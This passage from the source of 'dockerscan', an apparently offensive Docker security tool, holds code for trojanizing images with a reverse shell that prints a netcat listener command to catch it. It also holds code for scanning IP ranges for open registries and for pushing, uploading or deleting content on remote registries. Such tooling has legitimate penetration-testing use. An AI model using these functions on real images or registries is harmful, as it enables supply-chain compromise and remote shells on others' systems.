32 | os.path.abspath(os.path.basename(config.image_path)))
33 | ))
34 | log.console("To receive the reverse shell, only write:")
35 | log.console(" > nc -v -k -l {} {}".format(
36 | config.remote_addr,
37 | config.remote_port
38 | ))
39 |
40 |
41 | def launch_dockerscan_image_modify_user_in_console(
42 | config: DockerImageInfoModifyUserModel):
43 | """Launch in console mode"""
44 |
45 | log.setLevel(get_log_level(config.verbosity))
46 |
47 | with run_in_console(config.debug):
48 |
49 | log.console("Starting analyzing docker image...")
50 | log.console("Selected image: '{}'".format(
51 | os.path.basename(config.image_path)))
52 | log.console("Updating to the new user: '{}'".format(
53 | os.path.basename(config.new_user)))
54 |
55 | run_image_modify_user_dockerscan(config)
56 |
57 | log.console("User updated successful")
58 |
59 |
60 | def launch_dockerscan_image_modify_entrypoint_in_console(
61 | config: DockerImageInfoModifyEntryPointModel):
62 | """Launch in console mode"""
63 |
64 | log.setLevel(get_log_level(config.verbosity))
65 |
66 | with run_in_console(config.debug):
67 |
68 | log.console("Starting analyzing docker image...")
69 | log.console("Selected image: '{}'".format(
70 | os.path.basename(config.image_path)))
71 | log.console("Updating to the new entry-point: '{}'".format(
72 | os.path.basename(config.new_entry_point)))
73 |
74 | run_image_modify_entry_point_dockerscan(config)
75 |
76 | log.console("Entry-point updated successful")
77 |
78 |
79 | __all__ = ("launch_dockerscan_image_modify_trojanize_in_console",
80 | "launch_dockerscan_image_modify_user_in_console",
81 | "run_image_modify_entry_point_dockerscan",
82 | "launch_dockerscan_image_modify_entrypoint_in_console")
83 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/model.py:
--------------------------------------------------------------------------------
1 | from dockerscan import SharedConfig, String
2 |
3 |
4 | class DockerImageInfoModifyTrojanizeModel(SharedConfig):
5 | image_path = String()
6 | remote_addr = String()
7 | remote_port = String(default="2222")
8 | output_image = String(default="")
9 | custom_shell = String(default="")
10 |
11 |
12 | class DockerImageInfoModifyUserModel(SharedConfig):
13 | image_path = String()
14 | output_image = String(default="")
15 | new_user = String(default="")
16 |
17 |
18 | class DockerImageInfoModifyEntryPointModel(SharedConfig):
19 | image_path = String()
20 | new_entry_point = String()
21 | output_image = String(default="")
22 | binary_path = String(default="")
23 |
24 |
25 | __all__ = ("DockerImageInfoModifyTrojanizeModel",
26 | "DockerImageInfoModifyUserModel",
27 | "DockerImageInfoModifyEntryPointModel")
28 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/shells/reverse_shell.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/dockerscan/actions/image/modifiers/shells/reverse_shell.so
--------------------------------------------------------------------------------
/dockerscan/actions/registry/__init__.py:
--------------------------------------------------------------------------------
1 | from .api import *
2 | from .model import *
3 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/api.py:
--------------------------------------------------------------------------------
1 | import random
2 | import string
3 |
4 | from typing import Union
5 |
6 | from .model import *
7 | from ...core.exceptions import DockerscanTimeoutError
8 | from ..helpers import get_remote_registry_info, sanitize_url, \
9 | get_ssl_common_names
10 |
11 | from .libs import *
12 |
13 |
14 | def run_analyze_info_dockerscan(config: DockerAnalyzeInfoModel) -> \
15 | Union[DockerscanTimeoutError,
16 | RemoteRegistryDetails]:
17 |
18 | assert isinstance(config, DockerAnalyzeInfoModel)
19 |
20 | # Sanitize the URL
21 | target = sanitize_url(config.registry)
22 |
23 | # Detect remote version and if is authenticated
24 | version, is_auth = get_remote_registry_info(target)
25 |
26 | ssl_domains = get_ssl_common_names(target)
27 |
28 | # Build the results
29 | result = RemoteRegistryDetails(target,
30 | version,
31 | ssl_domains,
32 | is_auth)
33 |
34 | if result.version == 2:
35 | result.add_respositories(list_repositories_v2(target))
36 |
37 | return result
38 |
39 |
40 | def run_analyze_push_dockerscan(config: DockerAnalyzePushModel):
41 |
42 | assert isinstance(config, DockerAnalyzePushModel)
43 |
44 | # Sanitize the URL
45 | target = sanitize_url(config.registry)
46 |
47 | link = push_image_v2(target,
48 | config.image_name,
49 | config.local_image,
50 | config.tag)
51 |
52 | return link
53 |
54 |
55 | def run_analyze_upload_dockerscan(config: DockerAnalyzeUploadModel):
56 |
57 | assert isinstance(config, DockerAnalyzeUploadModel)
58 |
59 | # Sanitize the URL
60 | target = sanitize_url(config.registry)
61 |
62 | # Build remote file name
63 | remote_filename = config.remote_filename
64 | if not remote_filename:
65 | characters = string.ascii_lowercase + string.digits
66 |
67 | remote_filename = "".join(random.choice(characters)
68 | for x in range(random.randint(5, 20)))
69 |
70 | link, _ = upload_content_v2(target,
71 | remote_filename,
72 | config.local_file)
73 |
74 | return link
75 |
76 |
77 | def run_analyze_delete_dockerscan(config: DockerAnalyzePushModel):
78 |
79 | assert isinstance(config, DockerAnalyzePushModel)
80 |
81 | # Sanitize the URL
82 | target = sanitize_url(config.registry)
83 |
84 | delete_image_v2(target, config.image_name, config.tag)
85 |
86 |
87 | __all__ = ("run_analyze_info_dockerscan", "run_analyze_push_dockerscan",
88 | "run_analyze_delete_dockerscan", "run_analyze_upload_dockerscan")
89 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 |
4 | from .model import *
5 | from .console import *
6 | from ..helpers import check_console_input_config
7 |
8 |
9 | @click.group("registry", help="Docker registry actions")
10 | @click.pass_context
11 | def registry(ctx, **kwargs):
12 | pass
13 |
14 |
15 | @registry.command(help="get a summary from remote registry")
16 | @click.pass_context
17 | @click.argument("registry")
18 | def info(ctx, **kwargs):
19 | config = DockerAnalyzeInfoModel(**ctx.obj, **kwargs)
20 |
21 | # Check if valid
22 | if check_console_input_config(config):
23 | launch_dockerscan_analyze_info_in_console(config)
24 |
25 |
26 | @registry.command(help="Push a docker image to remote registry")
27 | @click.pass_context
28 | @click.argument("registry")
29 | @click.argument("local_image")
30 | @click.argument("image_name")
31 | @click.option("--tag", "-t", default="latest")
32 | def push(ctx, **kwargs):
33 | config = DockerAnalyzePushModel(**ctx.obj, **kwargs)
34 |
35 | # Check if valid
36 | if check_console_input_config(config):
37 | launch_dockerscan_analyze_push_in_console(config)
38 |
39 |
40 | @registry.command(help="upload a file to remote registry")
41 | @click.pass_context
42 | @click.argument("registry")
43 | @click.argument("local_file")
44 | @click.option("--remote-filename", "-r", "remote_filename")
45 | def upload(ctx, **kwargs):
46 | config = DockerAnalyzeUploadModel(**ctx.obj, **kwargs)
47 |
48 | # Check if valid
49 | if check_console_input_config(config):
50 | launch_dockerscan_analyze_upload_in_console(config)
51 |
52 |
53 | @registry.command(help="delete a image form remote registry")
54 | @click.pass_context
55 | @click.argument("registry")
56 | @click.argument("image_name")
57 | @click.option("--tag", "-t", default="latest")
58 | def delete(ctx, **kwargs):
59 | config = DockerAnalyzePushModel(**ctx.obj, **kwargs)
60 |
61 | # Check if valid
62 | if check_console_input_config(config):
63 | launch_dockerscan_analyze_delete_in_console(config)
64 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/console.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from dockerscan import get_log_level, DockerscanTimeoutError, run_in_console, \
4 | DockerscanError
5 |
6 | from .api import *
7 | from .model import *
8 | from ..helpers import sanitize_url, display_results_console
9 |
10 | log = logging.getLogger('dockerscan')
11 |
12 |
13 | def launch_dockerscan_analyze_info_in_console(config: DockerAnalyzeInfoModel):
14 |
15 | log.setLevel(get_log_level(config.verbosity))
16 |
17 | with run_in_console(config.debug):
18 |
19 | try:
20 | log.console("Starting analyzing docker Registry...")
21 | log.console("Selected registry: '{}'".format(
22 | sanitize_url(config.registry)))
23 |
24 | results = run_analyze_info_dockerscan(config)
25 |
26 | # Show results
27 | log.console("Analysis finished. Results:")
28 | display_results_console(results, log)
29 | except DockerscanTimeoutError as e:
30 | log.console(e)
31 |
32 |
33 | def launch_dockerscan_analyze_push_in_console(config: DockerAnalyzePushModel):
34 |
35 | log.setLevel(get_log_level(config.verbosity))
36 |
37 | with run_in_console(config.debug):
38 |
39 | try:
40 | log.console("Starting pushing process to Registry...")
41 | log.console("Selected registry: '{}'".format(
42 | sanitize_url(config.registry)))
43 |
44 | link = run_analyze_push_dockerscan(config)
45 |
46 | # Show results
47 | log.console("Image uploaded")
48 | log.console(" > {}".format(link))
49 |
50 | except DockerscanTimeoutError as e:
51 | log.console(e)
52 |
53 |
54 | def launch_dockerscan_analyze_upload_in_console(config: DockerAnalyzeUploadModel):
55 |
56 | log.setLevel(get_log_level(config.verbosity))
57 |
58 | with run_in_console(config.debug):
59 |
60 | try:
61 | log.console("Uploading file to Registry...")
62 | log.console("Selected registry: '{}'".format(
63 | sanitize_url(config.registry)))
64 |
65 | link = run_analyze_upload_dockerscan(config)
66 |
67 | # Show results
68 | log.console("File location:")
69 | log.console(" > {}".format(link))
70 |
71 | except DockerscanTimeoutError as e:
72 | log.console(e)
73 |
74 |
75 | def launch_dockerscan_analyze_delete_in_console(config: DockerAnalyzePushModel):
76 |
77 | log.setLevel(get_log_level(config.verbosity))
78 |
79 | with run_in_console(config.debug):
80 |
81 | try:
82 | log.console("Starting delete process to Registry...")
83 | log.console("Selected registry: '{}'".format(
84 | sanitize_url(config.registry)))
85 |
86 | run_analyze_delete_dockerscan(config)
87 |
88 | log.console("Deleted images")
89 |
90 | # Show results
91 | log.console("Image uploaded")
92 | except DockerscanError as e:
93 | log.console(e)
94 | except DockerscanTimeoutError as e:
95 | log.console(e)
96 |
97 |
98 | __all__ = ("launch_dockerscan_analyze_info_in_console",
99 | "launch_dockerscan_analyze_push_in_console",
100 | "launch_dockerscan_analyze_delete_in_console",
101 | "launch_dockerscan_analyze_upload_in_console")
102 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/libs/__init__.py:
--------------------------------------------------------------------------------
1 | from .helpers import *
2 | from .registry_v2 import *
3 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/libs/helpers.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/dockerscan/actions/registry/libs/helpers.py
--------------------------------------------------------------------------------
/dockerscan/actions/registry/libs/registry_v2.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Set, Tuple, Union
3 |
4 | import requests
5 |
6 | from dxf import DXF
7 | from dockerscan import DockerscanNotExitsError, DockerscanError
8 |
9 |
10 | def _get_digest_by_tag(registry: str,
11 | remote_image_name: str,
12 | tag: str) -> str:
13 | insecure, registry_without_schema = _get_schema_and_security(registry)
14 |
15 | d = DXF(registry_without_schema,
16 | remote_image_name,
17 | insecure=insecure)
18 |
19 | try:
20 | return d.get_alias(alias=tag)[0]
21 | except (IndexError, requests.exceptions.HTTPError):
22 | return ""
23 |
24 |
25 | def _get_schema_and_security(registry:str) -> tuple:
26 | insecure = True
27 | if registry.startswith("https://"):
28 | insecure = False
29 |
30 | if registry.startswith("http"):
31 | k = "://"
32 | registry_without_schema = registry[registry.find(k) + len(k):]
33 | else:
34 | registry_without_schema = registry
35 |
36 | return insecure, registry_without_schema
37 |
38 |
39 | def list_repositories_v2(registry: str):
40 |
41 | # List repositories
42 | r = requests.get("{}/v2/_catalog".format(registry),
43 | timeout=2,
44 | allow_redirects=False,
45 | verify=False)
46 | return r.json().get("repositories", [])
47 |
48 |
49 | def upload_content_v2(registry: str,
50 | remote_image_name: str,
51 | local_image: str) -> Tuple[str, str]:
52 | """
53 | Push a content to Docker Registry and return the URL to access
54 |
55 | :return: a tuple (image_link: str, image_digest: str)
56 | """
57 |
58 | # Replace \\ -> none --> because in command line we can't write
59 | # "nginx:latest" without the \\ ---> "nginx\:latest"
60 | _image = os.path.abspath(local_image.replace("\\", ""))
61 |
62 | if not os.path.exists(_image):
63 | raise DockerscanNotExitsError("Local image selected do not exits")
64 |
65 | insecure, registry_without_schema = _get_schema_and_security(registry)
66 |
67 | d = DXF(registry_without_schema,
68 | remote_image_name,
69 | insecure=insecure)
70 | image_digest = d.push_blob(_image)
71 |
72 | # Image link
73 | img_link = "{schema}://{host}/v2/{repo}/blobs/sha256:{digest}".format(
74 | schema="http" if insecure else "https",
75 | host=registry_without_schema,
76 | repo=remote_image_name,
77 | digest=image_digest
78 | )
79 |
80 | return img_link, image_digest
81 |
82 |
83 | def push_image_v2(registry: str,
84 | remote_image_name: str,
85 | local_image: str,
86 | tag: str) -> str:
87 | """Push a content to Docker Registry and return the URL to access"""
88 |
89 | insecure, registry_without_schema = _get_schema_and_security(registry)
90 |
91 | download_link, digest = upload_content_v2(registry, remote_image_name, local_image)
92 |
93 | d = DXF(registry_without_schema,
94 | remote_image_name,
95 | insecure=insecure)
96 | d.set_alias(tag, digest)
97 |
98 | return download_link
99 |
100 |
101 | def delete_image_v2(registry: str,
102 | remote_image_name: str,
103 | tag: str = "latest") -> Union[Set[str],
104 | DockerscanError]:
105 | """
106 | delete selected images from remote repo.
107 |
108 | remote_image_name can contain regex expressions.
109 |
110 | :return: return a set() with the images deleted
111 | """
112 | insecure, registry_without_schema = _get_schema_and_security(registry)
113 |
114 | d = DXF(registry_without_schema,
115 | remote_image_name,
116 | insecure=insecure)
117 |
118 | removed = set()
119 |
120 | # Getting remote digest for the tag
121 | digest = _get_digest_by_tag(registry, remote_image_name, tag)
122 |
123 | if not digest:
124 | raise DockerscanError("> Can't obtain digest reference for selected "
125 | "image / tag")
126 |
127 | try:
128 | if digest:
129 | # If digest found -> remote image is not a regex. Then remove it
130 |
131 | d.del_alias(digest)
132 |
133 | removed.add(remote_image_name)
134 |
135 | return removed
136 |
137 | except requests.exceptions.HTTPError:
138 | raise DockerscanError("> Registry does not support delete "
139 | "operations. Default Docker Registry does not "
140 | "support deletion. For more information see: "
141 | "https://docs.docker.com/registry/"
142 | "configuration/")
143 |
144 | __all__ = ("list_repositories_v2", "upload_content_v2", "push_image_v2",
145 | "delete_image_v2")
146 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/model.py:
--------------------------------------------------------------------------------
1 | from dockerscan import SharedConfig, String
2 |
3 |
4 | class DockerAnalyzeInfoModel(SharedConfig):
5 | registry = String()
6 |
7 |
8 | class DockerAnalyzeUploadModel(SharedConfig):
9 | registry = String()
10 | local_file = String()
11 | remote_filename = String(default="")
12 |
13 |
14 | class DockerAnalyzePushModel(SharedConfig):
15 | registry = String()
16 | local_image = String()
17 | image_name = String()
18 | tag = String(default="latest")
19 |
20 |
21 | class DockerAnalyzeDeleteModel(SharedConfig):
22 | registry = String()
23 | image = String()
24 |
25 |
26 | class RemoteRegistryDetails:
27 |
28 | def __init__(self,
29 | address: str,
30 | version: int,
31 | domains: set,
32 | has_authentication: bool):
33 | self.address = address
34 | self.version = version
35 | self.domains = domains
36 | self.has_authentication = has_authentication or False
37 | self.repositories = set()
38 |
39 | def add_respositories(self, repos: list):
40 | self.repositories.update(repos)
41 |
42 | def __repr__(self):
43 | return "".format(
44 | self.address,
45 | self.version,
46 | "Open" if not self.has_authentication else "Enabled"
47 | )
48 |
49 | __all__ = ("DockerAnalyzeInfoModel", "RemoteRegistryDetails",
50 | "DockerAnalyzeUploadModel", "DockerAnalyzeDeleteModel",
51 | "DockerAnalyzePushModel")
52 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/__init__.py:
--------------------------------------------------------------------------------
1 | from .api import *
2 | from .model import *
3 | from .console import *
4 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/api.py:
--------------------------------------------------------------------------------
1 | import ssl
2 | import socket
3 | import asyncio
4 | import logging
5 | import ipaddress
6 |
7 | from typing import Set, Dict
8 |
9 | from .model import *
10 |
11 | log = logging.getLogger("dockerscan")
12 |
13 |
14 | # --------------------------------------------------------------------------
15 | # Helpers
16 | # --------------------------------------------------------------------------
17 | def _expand_ips(raw_target: str) -> Set[str]:
18 | def _expand_ip(ip: str) -> list:
19 | if "/" in target:
20 | try:
21 | return [str(x) for x in ipaddress.ip_network(
22 | target,
23 | strict=False).hosts()]
24 | except ValueError:
25 | # If this error es reach -> target is a domain
26 | _domain, _subnet, *_ = target.split("/", maxsplit=2)
27 | new_target = "{}/{}".format(socket.gethostbyname(_domain),
28 | _subnet)
29 |
30 | return [str(x) for x in ipaddress.ip_network(
31 | new_target,
32 | strict=False).hosts()]
33 | else:
34 | try:
35 | return [str(ipaddress.ip_address(target))]
36 | except ValueError:
37 | new_target = socket.gethostbyname(target)
38 |
39 | return [str(x) for x in ipaddress.ip_network(
40 | new_target,
41 | strict=False).hosts()]
42 |
43 | if "-" in raw_target:
44 | targets = raw_target.split("-")
45 | else:
46 | targets = [raw_target]
47 |
48 | ip_address_expanded = set()
49 |
50 | # Expand IPs
51 | for target in targets:
52 | # Extract IP address
53 | ip_address_expanded.update(_expand_ip(target))
54 |
55 | return ip_address_expanded
56 |
57 |
58 | def _expand_ports(raw_ports: str) -> Set[int]:
59 |
60 | total_ports = set()
61 |
62 | for port_element in raw_ports.split(","):
63 |
64 | if "-" in port_element:
65 | _p = port_element.split("-", maxsplit=1)
66 |
67 | if len(_p) == 2 and all(x for x in _p):
68 | sorted(_p)
69 | port_start = int(_p[0])
70 | port_end = int(_p[1])
71 |
72 | ports_ranges = range(port_start, port_end)
73 |
74 | else:
75 |
76 | # If more than 2 elements of less than 1, only get the first
77 | # port at start port and the end port
78 | ports_ranges = [_p[0]]
79 |
80 | else:
81 | ports_ranges = [port_element]
82 |
83 | total_ports.update(ports_ranges)
84 |
85 | return total_ports
86 |
87 | # --------------------------------------------------------------------------
88 | # Scanner
89 | # --------------------------------------------------------------------------
90 | async def _get_connection(target,
91 | port,
92 | ssl,
93 | timeout,
94 | loop):
95 | con = asyncio.open_connection(host=target,
96 | port=port,
97 | ssl=ssl)
98 |
99 | try:
100 | reader, writer = await asyncio.wait_for(con,
101 | int(timeout),
102 | loop=loop)
103 |
104 | return reader, writer
105 | except (asyncio.TimeoutError, ConnectionRefusedError):
106 | # If this is reach -> port closed
107 | return None, None
108 |
109 | async def _check_ports(target: str,
110 | port: int,
111 | loop: asyncio.AbstractEventLoop,
112 | sem: asyncio.BoundedSemaphore,
113 | results: list,
114 | config: DockerScanModel):
115 |
116 | open_ports = set()
117 |
118 | # for port in ports:
119 |
120 | log.error(" > Trying {}:{}".format(target, port))
121 |
122 | is_ssl = True
123 |
124 | try:
125 | # If connection SSL?
126 | try:
127 | # This definition of ssl context allow to connect with servers with
128 | # self-signed certs
129 | sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
130 | sslcontext.options |= ssl.OP_NO_SSLv2
131 | sslcontext.options |= ssl.OP_NO_SSLv3
132 | sslcontext.options |= getattr(ssl, "OP_NO_COMPRESSION", 0)
133 | sslcontext.set_default_verify_paths()
134 |
135 | reader, writer = await _get_connection(target,
136 | port,
137 | sslcontext,
138 | config.timeout,
139 | loop)
140 |
141 | if not reader:
142 | return
143 |
144 | except ssl.SSLError:
145 | reader, writer = await _get_connection(target,
146 | port,
147 | None,
148 | config.timeout,
149 | loop)
150 |
151 | if not reader:
152 | return
153 |
154 | is_ssl = False
155 |
156 | # Send HTTP Header
157 | writer.write(
158 | "GET /v2/ HTTP/1.1\r\nHost: {}\r\n\r\n".format(target).encode()
159 | )
160 |
161 | # Get Server response
162 | reader = reader.read(1000)
163 | try:
164 | data = await asyncio.wait_for(reader,
165 | 1,
166 | loop=loop)
167 | except (asyncio.TimeoutError, ConnectionRefusedError):
168 | # If this point reached -> server doesn't sent response
169 | return
170 |
171 | if b"registry/2.0" in data or \
172 | b"Docker-Distribution-Api-Version" in data:
173 |
174 | content = data.lower()
175 |
176 | if b"200 ok" in content:
177 | status = "open"
178 | elif b"401" in content:
179 | status = "auth required"
180 | else:
181 | status = "reachable"
182 |
183 | log.info(" + Discovered port {}:{}".format(
184 | target,
185 | port
186 | ))
187 |
188 | open_ports.add((port, status, is_ssl))
189 |
190 | # close descriptor
191 | writer.close()
192 |
193 | if open_ports:
194 | results.append(
195 | {
196 | target: open_ports
197 | }
198 | )
199 |
200 | finally:
201 | sem.release()
202 |
203 |
204 | async def _scan(targets: Set[str],
205 | ports: Set[int],
206 | config: DockerScanModel,
207 | loop: asyncio.AbstractEventLoop):
208 |
209 | max_concurrency = asyncio.BoundedSemaphore(int(config.concurrency),
210 | loop=loop)
211 |
212 | results = []
213 | tasks = []
214 |
215 | for target in targets:
216 | for port in ports:
217 | await max_concurrency.acquire()
218 |
219 | tasks.append(loop.create_task(_check_ports(
220 | target,
221 | port,
222 | loop,
223 | max_concurrency,
224 | results,
225 | config
226 | )))
227 |
228 | await asyncio.wait(tasks, loop=loop)
229 |
230 | return results
231 |
232 |
233 | def run_scan_dockerscan(config: DockerScanModel) -> Dict[str, list]:
234 | assert isinstance(config, DockerScanModel)
235 |
236 | # Expand IPs
237 | total_ips = _expand_ips(config.target)
238 | log.critical(" - Total host to analyze: {}".format(len(total_ips)))
239 |
240 | # Expand Ports
241 | total_ports = _expand_ports(config.ports)
242 | log.critical(" - Total port per host to check: {}".format(len(total_ports)))
243 |
244 | loop = asyncio.get_event_loop()
245 |
246 | try:
247 | results = loop.run_until_complete(_scan(total_ips,
248 | total_ports,
249 | config,
250 | loop))
251 |
252 | finally:
253 | for t in asyncio.Task.all_tasks(loop=loop):
254 | t.cancel()
255 |
256 | # Ensure all the tasks ends
257 | async def close_delay_loop():
258 | loop.stop()
259 |
260 | loop.run_until_complete(asyncio.ensure_future(close_delay_loop()))
261 |
262 | return results
263 |
264 |
265 | __all__ = ("run_scan_dockerscan",)
266 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 | from .model import *
4 | from .console import *
5 | from ..helpers import check_console_input_config
6 |
7 |
8 | @click.command(help="Search for Open Docker Registries")
9 | @click.pass_context
10 | @click.argument("target")
11 | @click.option("--timeout", "-t", "timeout", help="timeout for each port-check")
12 | @click.option("--ports", "-p", "ports",
13 | help="ports to test. i.e: 80,443,8000-8080")
14 | @click.option("-c", "concurrency", help="Maximum concurrency scans")
15 | def scan(ctx, **kwargs):
16 | config = DockerScanModel(**ctx.obj, **kwargs)
17 |
18 | # Check if valid
19 | if check_console_input_config(config):
20 | launch_dockerscan_scan_in_console(config)
21 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/console.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from dockerscan import get_log_level, run_in_console
4 |
5 | from .api import *
6 | from .model import *
7 |
8 | log = logging.getLogger('dockerscan')
9 |
10 |
11 | def launch_dockerscan_scan_in_console(config: DockerScanModel):
12 | """Launch in console mode"""
13 |
14 | log.setLevel(get_log_level(config.verbosity))
15 |
16 | with run_in_console(config.debug):
17 |
18 | log.console("Starting the scanning")
19 |
20 | results = run_scan_dockerscan(config)
21 |
22 | log.console("Scanning results:")
23 | if results:
24 | for result in results:
25 | for host, open_ports in result.items():
26 | log.console(" > Registry: {}".format(host))
27 |
28 | for port, status, is_ssl in open_ports:
29 | log.console(" - {}/TCP - [SSL: {}] - [{}]".format(
30 | port,
31 | "Enabled" if is_ssl else "Disabled",
32 | status.upper()))
33 |
34 | else:
35 | log.console("No registries found")
36 |
37 |
38 | __all__ = ("launch_dockerscan_scan_in_console",)
39 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/model.py:
--------------------------------------------------------------------------------
1 |
2 | from dockerscan import SharedConfig, String, Integer
3 |
4 |
5 | class DockerScanModel(SharedConfig):
6 | ports = String(default="443,80,8080,8000,5000")
7 | target = String()
8 | concurrency = String(default="4")
9 | timeout = String(default="2")
10 |
11 | __all__ = ("DockerScanModel",)
12 |
--------------------------------------------------------------------------------
/dockerscan/core/__init__.py:
--------------------------------------------------------------------------------
1 | from .model import *
2 | from .logger import *
3 | from .helpers import *
4 | from .exceptions import *
5 | from .shared_cmd_options import *
6 |
7 | setup_logging("dockerscan")
8 |
--------------------------------------------------------------------------------
/dockerscan/core/exceptions.py:
--------------------------------------------------------------------------------
1 | class DockerscanError(Exception):
2 | pass
3 |
4 |
5 | class DockerscanValueError(ValueError):
6 | pass
7 |
8 |
9 | class DockerscanTypeError(TypeError):
10 | pass
11 |
12 |
13 | class DockerscanTimeoutError(TypeError):
14 | pass
15 |
16 |
17 | class DockerscanNotExitsError(TypeError):
18 | pass
19 |
20 |
21 | class DockerscanReturnContextManager(Exception):
22 | pass
23 |
24 | __all__ = ("DockerscanError", "DockerscanValueError", "DockerscanTypeError",
25 | "DockerscanTimeoutError", "DockerscanNotExitsError",
26 | "DockerscanReturnContextManager")
27 |
--------------------------------------------------------------------------------
/dockerscan/core/helpers.py:
--------------------------------------------------------------------------------
1 | """
2 | This file contains utils and reusable functions
3 | """
4 | import logging
5 |
6 | from collections import namedtuple
7 | from contextlib import contextmanager
8 |
9 | log = logging.getLogger("dockerscan")
10 |
11 |
12 | def dict_to_obj(data):
13 | """
14 | Transform an input dict into a object.
15 |
16 | >>> data = dict(hello="world", bye="see you")
17 | >>> obj = dict_to_obj(data)
18 | >>> obj.hello
19 | 'world'
20 |
21 | :param data: input dictionary data
22 | :type data: dict
23 | """
24 | assert isinstance(data, dict)
25 |
26 | if not data:
27 | return namedtuple("OBJ", [])
28 |
29 | obj = namedtuple("OBJ", list(data.keys()))
30 |
31 | return obj(**data)
32 |
33 |
34 | def get_log_level(verbosity: int) -> int:
35 | verbosity *= 10
36 |
37 | if verbosity > logging.CRITICAL:
38 | verbosity = logging.CRITICAL
39 |
40 | if verbosity < logging.DEBUG:
41 | verbosity = logging.DEBUG
42 |
43 | return (logging.CRITICAL - verbosity) + 10
44 |
45 |
46 | @contextmanager
47 | def run_in_console(debug=False):
48 | try:
49 | yield
50 | except Exception as e:
51 | log.critical(" !! {}".format(e))
52 |
53 | if debug:
54 | log.exception(" !! Unhandled exception: %s" % e, stack_info=True)
55 | finally:
56 | log.debug("Shutdown...")
57 |
58 |
59 | __all__ = ("dict_to_obj", "get_log_level", "run_in_console")
60 |
--------------------------------------------------------------------------------
/dockerscan/core/logger.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | import os
4 | import logging
5 | import logging.handlers
6 |
7 | from colorlog import ColoredFormatter
8 |
9 | CONSOLE_LEVEL = 1000
10 |
11 |
12 | def setup_logging(name):
13 | """
14 | Setup initial logging configuration
15 | """
16 |
17 | assert isinstance(name, str)
18 |
19 | # Add console level
20 | logging.addLevelName(CONSOLE_LEVEL, "CONSOLE_LEVEL")
21 |
22 | def console(self, message, *args, **kws): # pragma no cover
23 | # Yes, logger takes its '*args' as 'args'.
24 | if self.isEnabledFor(CONSOLE_LEVEL):
25 | self._log(CONSOLE_LEVEL, message, args, **kws)
26 |
27 | logging.Logger.console = console
28 | logging.Logger.raw_console = console
29 |
30 | # Init logger
31 | logger = logging.getLogger(name)
32 |
33 | # Handler: console
34 | formatter = ColoredFormatter(
35 | "[ %(log_color)s*%(reset)s ] %(blue)s%(message)s",
36 | datefmt=None,
37 | reset=True,
38 | log_colors={
39 | 'DEBUG': 'cyan',
40 | 'INFO': 'white',
41 | 'WARNING': 'yellow',
42 | 'ERROR': 'red',
43 | 'CRITICAL': 'red,bg_white',
44 | 'CONSOLE_LEVEL': 'green'
45 | },
46 | secondary_log_colors={},
47 | style='%'
48 | )
49 |
50 | log_console = logging.StreamHandler()
51 | log_console.setFormatter(formatter)
52 |
53 | # -------------------------------------------------------------------------
54 | # Add all of handlers to logger config
55 | # -------------------------------------------------------------------------
56 | logger.addHandler(log_console)
57 |
58 |
59 | def setup_file_logger(location_file_name: str):
60 | logger = logging.getLogger(location_file_name)
61 |
62 | # Set file log format
63 | file_format = logging.Formatter(
64 | '[%(levelname)s] %(asctime)s - %(message)s', "%Y-%m-%d %H:%M:%S")
65 | log_file = logging.FileHandler(
66 | filename=os.path.join(os.getcwd(), "aiotasks.log"))
67 |
68 | log_file.setFormatter(file_format)
69 | logger.addHandler(log_file)
70 |
71 | __all__ = ("setup_logging", "setup_file_logger", "CONSOLE_LEVEL")
72 |
--------------------------------------------------------------------------------
/dockerscan/core/model.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | from booby import *
4 |
5 |
6 | class SharedConfig(Model):
7 | verbosity = Integer(default=0)
8 | debug = Boolean(default=False)
9 | timeout = Integer(default=10)
10 |
--------------------------------------------------------------------------------
/dockerscan/core/shared_cmd_options.py:
--------------------------------------------------------------------------------
1 | import re
2 | import os
3 | import click
4 | import codecs
5 |
6 | #
7 | # Get version software version
8 | #
9 | version_file = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), "..")), '__init__.py')
10 | with codecs.open(version_file, 'r', 'latin1') as fp: # pragma no cover
11 | try:
12 | version = re.findall(r"^__version__ = ['\"]([^']+)['\"]\r?$",
13 | fp.read(), re.M)[0]
14 | except IndexError:
15 | raise RuntimeError('Unable to determine version.')
16 |
17 | # --------------------------------------------------------------------------
18 | # Common options for command line interface
19 | # --------------------------------------------------------------------------
20 | global_options_list = (
21 | # General
22 | click.option('-v', 'verbosity', count=True, type=int, default=1,
23 | help='Verbose output'),
24 | click.option('-d', 'debug', is_flag=True, default=False,
25 | help='enable debug'),
26 | click.option('--quiet', '-q', 'verbosity', flag_value=0,
27 | help='Minimal output'),
28 | click.version_option(version=version)
29 | )
30 |
31 |
32 | class global_options(object):
33 | def __init__(self, invoke_without_command=False):
34 | assert isinstance(invoke_without_command, bool)
35 |
36 | self.invoke_without_command = invoke_without_command
37 |
38 | def __call__(self, f):
39 | def wrapped_f(*args):
40 | fn = f
41 | for option in reversed(global_options_list):
42 | fn = option(f)
43 |
44 | fn = click.group(context_settings={'help_option_names': ['-h', '--help']},
45 | invoke_without_command=self.invoke_without_command)(fn)
46 |
47 | return fn
48 |
